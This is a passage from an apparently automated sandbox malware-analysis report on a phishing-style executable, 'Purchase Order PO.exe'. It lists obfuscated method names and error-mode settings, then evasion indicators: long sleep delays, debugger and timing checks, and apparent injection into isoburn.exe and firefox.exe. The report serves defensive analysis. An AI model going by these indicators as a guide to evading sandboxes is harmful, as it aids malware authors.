                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, FPfKGBzH4SovIoX8LK.csHigh entropy of concatenated method names: 'ouGiQRLbMR', 'ibQiSFa6qx', 'JFfiquOht1', 'qo7iWSNRfj', 'sAViVoZJhv', 'MpTi6sXfV3', 'EDKiUV4VDx', 'KNNilhkCx9', 'yhMiKHYrel', 'LyKiv5Y1Ar'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, cn0aPwq6bsmfaOcDCo.csHigh entropy of concatenated method names: 'LnlfmWY9ux', 'YrxfQMYp9T', 'iSTfSgEpTJ', 'PqKfqj0vQV', 'qwQf1AhqFd', 'RHpfkYQMFO', 'e14f4e60EC', 't0Pf9WO4eR', 'n40fRoDNtd', 'uMPfi2FhKM'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, iy7HYF22gAjNId4ttrA.csHigh entropy of concatenated method names: 'c2viD3XJvD', 'Bbciz5VP0v', 'aHGeZSplID', 'DOae2w9RsB', 'kU4eIKQP6F', 'Y2uegxD7q7', 'OgoecABiVD', 'HLVeo62yMd', 'CUUeLjj3Mc', 'cZceYrpM60'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, RNTHW2S4uo86L5o1JA.csHigh entropy of concatenated method names: 'yxxYjeRac6', 'kyWYrrhirS', 'tmvY3npNwP', 'rg6YToxkKd', 'KO3YnFlKyf', 'aLPY7kfGqt', 'oslYsw3xUj', 'rmfYCiN38s', 'FTWYhynx1d', 'VxMYDa3f3i'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.csHigh entropy of concatenated method names: 'C7lgohYFLH', 'bC8gLtnwFe', 'yhQgYqEbba', 'YyygfTPToq', 'Y9qgbWFhWG', 'lr7gN7OxYW', 'mWKg8fvn8A', 'GQ2guBrTr0', 'Q33gM1L6Ho', 'BHfgH31Q4N'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, jhw04bWmQhIXem2aoS.csHigh entropy of concatenated method names: 'ALwNon5ush', 'XqpNY1mey3', 'ofKNbYVK6o', 'Jh9N8o0FKX', 'XEWNuZSLQF', 'mfcbnNPYFS', 'mi6b7NkaKb', 'NagbsrNJoy', 'w34bC4dErm', 'digbh64w6U'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, X4aqCayM4O0bjg6BHK.csHigh entropy of concatenated method names: 'gX18KsW7ML', 'Kvc8vFDgOf', 'qqk8FA70SX', 'TnH8mYqijo', 'G9G8Gf2OPi', 'jkM8Q1qO6J', 'QyU8wEWLCl', 'pwZ8SIiCNO', 'Bur8qeaOqZ', 'LVv8PWWcdx'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, DAK3xI7QBPJNVvpJA7.csHigh entropy of concatenated method names: 'Q0o4CDuKa9', 'oXl4DrO3pb', 'Hx69ZT7u05', 'A4n92uqWWc', 'F5y4Okqrfk', 't7s4EWDJaK', 'cm44x72v8B', 'he54jNITg2', 'eGL4r8D7Ve', 'avm43LraTv'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, TdMXwk2IOCUbuPKgiCM.csHigh entropy of concatenated method names: 'ToString', 'TjOeS2sw73', 'G1aeqVUgoS', 'VpEePZB1yL', 'EbJeW4yc8H', 'fbIeVWRFOq', 'VgEe03S1SR', 'OjNe6vidZM', 'DxIRpGopRJrsKwtaQao', 'MPu0yyoiQ7gtj94EbUk'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, ysYRXux16dGSwPvXBR.csHigh entropy of concatenated method names: 'CXTpSbACMu', 'M07pqurkA4', 'bslpWdbWXM', 'bKupVdZ7w5', 'lqSp6bWiGo', 'IbYpUI0bwa', 'MIupB7PCEN', 'rIFptjTGUU', 'ATBp5XngTa', 'aOOpOrZRSB'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, L8jdffjmDIPT7Qog1H.csHigh entropy of concatenated method names: 'K4W15mjdRb', 'Gxc1E8J10e', 'OAS1jXU2Rb', 'Eki1r60tUX', 'IkV1V888FI', 'IT510Bsfnn', 'VS416FjlYw', 'UhR1U0FDRD', 'vll1dmAem1', 'no21Bdp5dY'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, O0BJiGs6mRPrNTXCp8.csHigh entropy of concatenated method names: 'LBrR1JTgBt', 'WqvR42eyB5', 'Hl0RRZYAQl', 'X6VRewFVKo', 'A1iRApxifW', 'Rv8RlFJgeV', 'Dispose', 'qBy9LovUHs', 'TV19YC0JRk', 'hCk9fci3oN'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, IE0GcRI72Kb56a0DmM.csHigh entropy of concatenated method names: 'B39FD4Sut', 'nkBmI3g0c', 'uhoQFV2WS', 'd4AwLlOK6', 'RJnqqRgsp', 'GKNP3K53J', 'EHZXVbXNk3nDQ7r7l3', 'fqJwY4tmbwHVcFMwYT', 'gPT9W3t6S', 'uT7ivDwWb'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, vjFbPYDPCvOxXUBpPb.csHigh entropy of concatenated method names: 'tKeifFfoN6', 'SYHibPSqPa', 'yJIiN0QMZh', 'Yvxi81QDtd', 'J7eiR0rWCf', 'EKiiuMgPDP', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, OoBgA3fa7Eks4FMyOk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Fu0IhNdXts', 'MpJIDGgfuB', 'bMPIzJRin6', 'zr1gZd2f4l', 'cvMg27alc3', 'TxFgIPCMx9', 'foKgg5HL6v', 'D31eN1vJ7gV3BBnJWmh'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, V5El6G3x7Lp6nDysBU.csHigh entropy of concatenated method names: 'ToString', 'WwYkOJNChY', 'OdkkVFmMER', 'NLAk0S7XX6', 'rB7k6HOF95', 'HeokUjrlmb', 'gDdkdweoNu', 'FKwkBEwenr', 'yZNktqmh4m', 'u1tkyd7W6d'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, hb5C4BBngYsx8EuB68.csHigh entropy of concatenated method names: 'k0v8LqNm5m', 'e2J8f3CBF3', 'MiT8NPqj7y', 'fR7NDOHL0k', 'fLWNzCLchJ', 'eTo8ZbXtmv', 'GhN82Qhorb', 'CZF8IyHKmG', 't4D8g9ofX2', 'SXO8cGVXel'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, vqvkmUP9Q4RtuG00VD.csHigh entropy of concatenated method names: 'GITbGoBEM4', 'x5kbw5mNJd', 'uL1f0SS1Qn', 'ImHf6lh1uw', 'DeffU9RQUu', 'CspfdnOciM', 'hO2fBYfpvy', 'KVvfto91NO', 'gmRfyv6nof', 'FiGf5KTqwv'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, olX3xchBxLDIMK3gZl.csHigh entropy of concatenated method names: 'm2nRWKWYPq', 'jPGRVYVqsi', 'tN2R0Kx8IZ', 'K9JR63HY7i', 'wyxRUZBSg8', 'VebRdUjQ4k', 'mdcRBnmJlx', 'jokRteMIFx', 'JQSRyivjFs', 'b3qR569rA7'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, aqp7ffcvundNltMO2S.csHigh entropy of concatenated method names: 'W5j28NTHW2', 'quo2u86L5o', 'C6b2HsmfaO', 'dDC2aoAqvk', 'B0021VD8hw', 'H4b2kmQhIX', 'UQETmkyP2BoWDqBFAn', 't4vFAQ5aWg1ApxaWuX', 'LNt222dQwy', 'OsU2g4Xa8O'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, DmkAepYXmip3Gmhb5O.csHigh entropy of concatenated method names: 'Dispose', 'rPr2hNTXCp', 'j8mIVStv2N', 'V6X8lEhMdQ', 'jjp2DRj75u', 'C2A2z9277R', 'ProcessDialogKey', 'MhpIZlX3xc', 'LxLI2DIMK3', 'cZlIIAjFbP'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, aVHThLTi1k5mI5OYTR.csHigh entropy of concatenated method names: 'tBo4HVuByT', 'VMC4anYFhd', 'ToString', 'v874L3UONR', 'aGm4YwKGTn', 'lEZ4fj2Rpj', 'iJV4bDreXj', 'm874NXFbMh', 'p1W48c0LwV', 'UDq4u8e79W'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, lpHqI52ckEnRBHScCjq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RHxJRoA02P', 'VYjJiY58aR', 'UPeJel4ggD', 'u67JJyH0sT', 'lAjJAkRWPb', 'OiSJXw7QY0', 'H4iJlr6ZMi'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, FPfKGBzH4SovIoX8LK.csHigh entropy of concatenated method names: 'ouGiQRLbMR', 'ibQiSFa6qx', 'JFfiquOht1', 'qo7iWSNRfj', 'sAViVoZJhv', 'MpTi6sXfV3', 'EDKiUV4VDx', 'KNNilhkCx9', 'yhMiKHYrel', 'LyKiv5Y1Ar'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, cn0aPwq6bsmfaOcDCo.csHigh entropy of concatenated method names: 'LnlfmWY9ux', 'YrxfQMYp9T', 'iSTfSgEpTJ', 'PqKfqj0vQV', 'qwQf1AhqFd', 'RHpfkYQMFO', 'e14f4e60EC', 't0Pf9WO4eR', 'n40fRoDNtd', 'uMPfi2FhKM'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, iy7HYF22gAjNId4ttrA.csHigh entropy of concatenated method names: 'c2viD3XJvD', 'Bbciz5VP0v', 'aHGeZSplID', 'DOae2w9RsB', 'kU4eIKQP6F', 'Y2uegxD7q7', 'OgoecABiVD', 'HLVeo62yMd', 'CUUeLjj3Mc', 'cZceYrpM60'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, RNTHW2S4uo86L5o1JA.csHigh entropy of concatenated method names: 'yxxYjeRac6', 'kyWYrrhirS', 'tmvY3npNwP', 'rg6YToxkKd', 'KO3YnFlKyf', 'aLPY7kfGqt', 'oslYsw3xUj', 'rmfYCiN38s', 'FTWYhynx1d', 'VxMYDa3f3i'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.csHigh entropy of concatenated method names: 'C7lgohYFLH', 'bC8gLtnwFe', 'yhQgYqEbba', 'YyygfTPToq', 'Y9qgbWFhWG', 'lr7gN7OxYW', 'mWKg8fvn8A', 'GQ2guBrTr0', 'Q33gM1L6Ho', 'BHfgH31Q4N'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, jhw04bWmQhIXem2aoS.csHigh entropy of concatenated method names: 'ALwNon5ush', 'XqpNY1mey3', 'ofKNbYVK6o', 'Jh9N8o0FKX', 'XEWNuZSLQF', 'mfcbnNPYFS', 'mi6b7NkaKb', 'NagbsrNJoy', 'w34bC4dErm', 'digbh64w6U'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, X4aqCayM4O0bjg6BHK.csHigh entropy of concatenated method names: 'gX18KsW7ML', 'Kvc8vFDgOf', 'qqk8FA70SX', 'TnH8mYqijo', 'G9G8Gf2OPi', 'jkM8Q1qO6J', 'QyU8wEWLCl', 'pwZ8SIiCNO', 'Bur8qeaOqZ', 'LVv8PWWcdx'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, DAK3xI7QBPJNVvpJA7.csHigh entropy of concatenated method names: 'Q0o4CDuKa9', 'oXl4DrO3pb', 'Hx69ZT7u05', 'A4n92uqWWc', 'F5y4Okqrfk', 't7s4EWDJaK', 'cm44x72v8B', 'he54jNITg2', 'eGL4r8D7Ve', 'avm43LraTv'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, TdMXwk2IOCUbuPKgiCM.csHigh entropy of concatenated method names: 'ToString', 'TjOeS2sw73', 'G1aeqVUgoS', 'VpEePZB1yL', 'EbJeW4yc8H', 'fbIeVWRFOq', 'VgEe03S1SR', 'OjNe6vidZM', 'DxIRpGopRJrsKwtaQao', 'MPu0yyoiQ7gtj94EbUk'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, ysYRXux16dGSwPvXBR.csHigh entropy of concatenated method names: 'CXTpSbACMu', 'M07pqurkA4', 'bslpWdbWXM', 'bKupVdZ7w5', 'lqSp6bWiGo', 'IbYpUI0bwa', 'MIupB7PCEN', 'rIFptjTGUU', 'ATBp5XngTa', 'aOOpOrZRSB'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, L8jdffjmDIPT7Qog1H.csHigh entropy of concatenated method names: 'K4W15mjdRb', 'Gxc1E8J10e', 'OAS1jXU2Rb', 'Eki1r60tUX', 'IkV1V888FI', 'IT510Bsfnn', 'VS416FjlYw', 'UhR1U0FDRD', 'vll1dmAem1', 'no21Bdp5dY'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, O0BJiGs6mRPrNTXCp8.csHigh entropy of concatenated method names: 'LBrR1JTgBt', 'WqvR42eyB5', 'Hl0RRZYAQl', 'X6VRewFVKo', 'A1iRApxifW', 'Rv8RlFJgeV', 'Dispose', 'qBy9LovUHs', 'TV19YC0JRk', 'hCk9fci3oN'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, IE0GcRI72Kb56a0DmM.csHigh entropy of concatenated method names: 'B39FD4Sut', 'nkBmI3g0c', 'uhoQFV2WS', 'd4AwLlOK6', 'RJnqqRgsp', 'GKNP3K53J', 'EHZXVbXNk3nDQ7r7l3', 'fqJwY4tmbwHVcFMwYT', 'gPT9W3t6S', 'uT7ivDwWb'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, vjFbPYDPCvOxXUBpPb.csHigh entropy of concatenated method names: 'tKeifFfoN6', 'SYHibPSqPa', 'yJIiN0QMZh', 'Yvxi81QDtd', 'J7eiR0rWCf', 'EKiiuMgPDP', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, OoBgA3fa7Eks4FMyOk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Fu0IhNdXts', 'MpJIDGgfuB', 'bMPIzJRin6', 'zr1gZd2f4l', 'cvMg27alc3', 'TxFgIPCMx9', 'foKgg5HL6v', 'D31eN1vJ7gV3BBnJWmh'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, V5El6G3x7Lp6nDysBU.csHigh entropy of concatenated method names: 'ToString', 'WwYkOJNChY', 'OdkkVFmMER', 'NLAk0S7XX6', 'rB7k6HOF95', 'HeokUjrlmb', 'gDdkdweoNu', 'FKwkBEwenr', 'yZNktqmh4m', 'u1tkyd7W6d'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, hb5C4BBngYsx8EuB68.csHigh entropy of concatenated method names: 'k0v8LqNm5m', 'e2J8f3CBF3', 'MiT8NPqj7y', 'fR7NDOHL0k', 'fLWNzCLchJ', 'eTo8ZbXtmv', 'GhN82Qhorb', 'CZF8IyHKmG', 't4D8g9ofX2', 'SXO8cGVXel'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, vqvkmUP9Q4RtuG00VD.csHigh entropy of concatenated method names: 'GITbGoBEM4', 'x5kbw5mNJd', 'uL1f0SS1Qn', 'ImHf6lh1uw', 'DeffU9RQUu', 'CspfdnOciM', 'hO2fBYfpvy', 'KVvfto91NO', 'gmRfyv6nof', 'FiGf5KTqwv'
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, olX3xchBxLDIMK3gZl.csHigh entropy of concatenated method names: 'm2nRWKWYPq', 'jPGRVYVqsi', 'tN2R0Kx8IZ', 'K9JR63HY7i', 'wyxRUZBSg8', 'VebRdUjQ4k', 'mdcRBnmJlx', 'jokRteMIFx', 'JQSRyivjFs', 'b3qR569rA7'
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Purchase Order PO.exe PID: 6700, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 79A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 89A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 8B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: 9B50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD096E rdtsc 2_2_01AD096E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 6216Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 3756Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Purchase Order PO.exe TID: 6740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep count: 6216 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep time: -12432000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep count: 3756 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 4324Thread sleep time: -7512000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep time: -46500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe TID: 5024Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D2C4E0 FindFirstFileW,FindNextFileW,FindClose,7_2_02D2C4E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003037000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`$Dw\
                Source: QfgdvbjddZ.exe, 00000008.00000002.4169902840.00000000012FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                Source: firefox.exe, 00000009.00000002.2436258729.000001B2D7D7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD096E rdtsc 2_2_01AD096E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00417723 LdrLoadDll,2_2_00417723
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD0185 mov eax, dword ptr fs:[00000030h]2_2_01AD0185
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1019F mov eax, dword ptr fs:[00000030h]2_2_01B1019F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1019F mov eax, dword ptr fs:[00000030h]2_2_01B1019F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1019F mov eax, dword ptr fs:[00000030h]2_2_01B1019F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1019F mov eax, dword ptr fs:[00000030h]2_2_01B1019F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B34180 mov eax, dword ptr fs:[00000030h]2_2_01B34180
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B34180 mov eax, dword ptr fs:[00000030h]2_2_01B34180
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B4C188 mov eax, dword ptr fs:[00000030h]2_2_01B4C188
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B4C188 mov eax, dword ptr fs:[00000030h]2_2_01B4C188
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A197 mov eax, dword ptr fs:[00000030h]2_2_01A8A197
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A197 mov eax, dword ptr fs:[00000030h]2_2_01A8A197
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8A197 mov eax, dword ptr fs:[00000030h]2_2_01A8A197
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B661E5 mov eax, dword ptr fs:[00000030h]2_2_01B661E5
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC01F8 mov eax, dword ptr fs:[00000030h]2_2_01AC01F8
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E1D0 mov eax, dword ptr fs:[00000030h]2_2_01B0E1D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E1D0 mov eax, dword ptr fs:[00000030h]2_2_01B0E1D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E1D0 mov ecx, dword ptr fs:[00000030h]2_2_01B0E1D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E1D0 mov eax, dword ptr fs:[00000030h]2_2_01B0E1D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E1D0 mov eax, dword ptr fs:[00000030h]2_2_01B0E1D0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B561C3 mov eax, dword ptr fs:[00000030h]2_2_01B561C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B561C3 mov eax, dword ptr fs:[00000030h]2_2_01B561C3
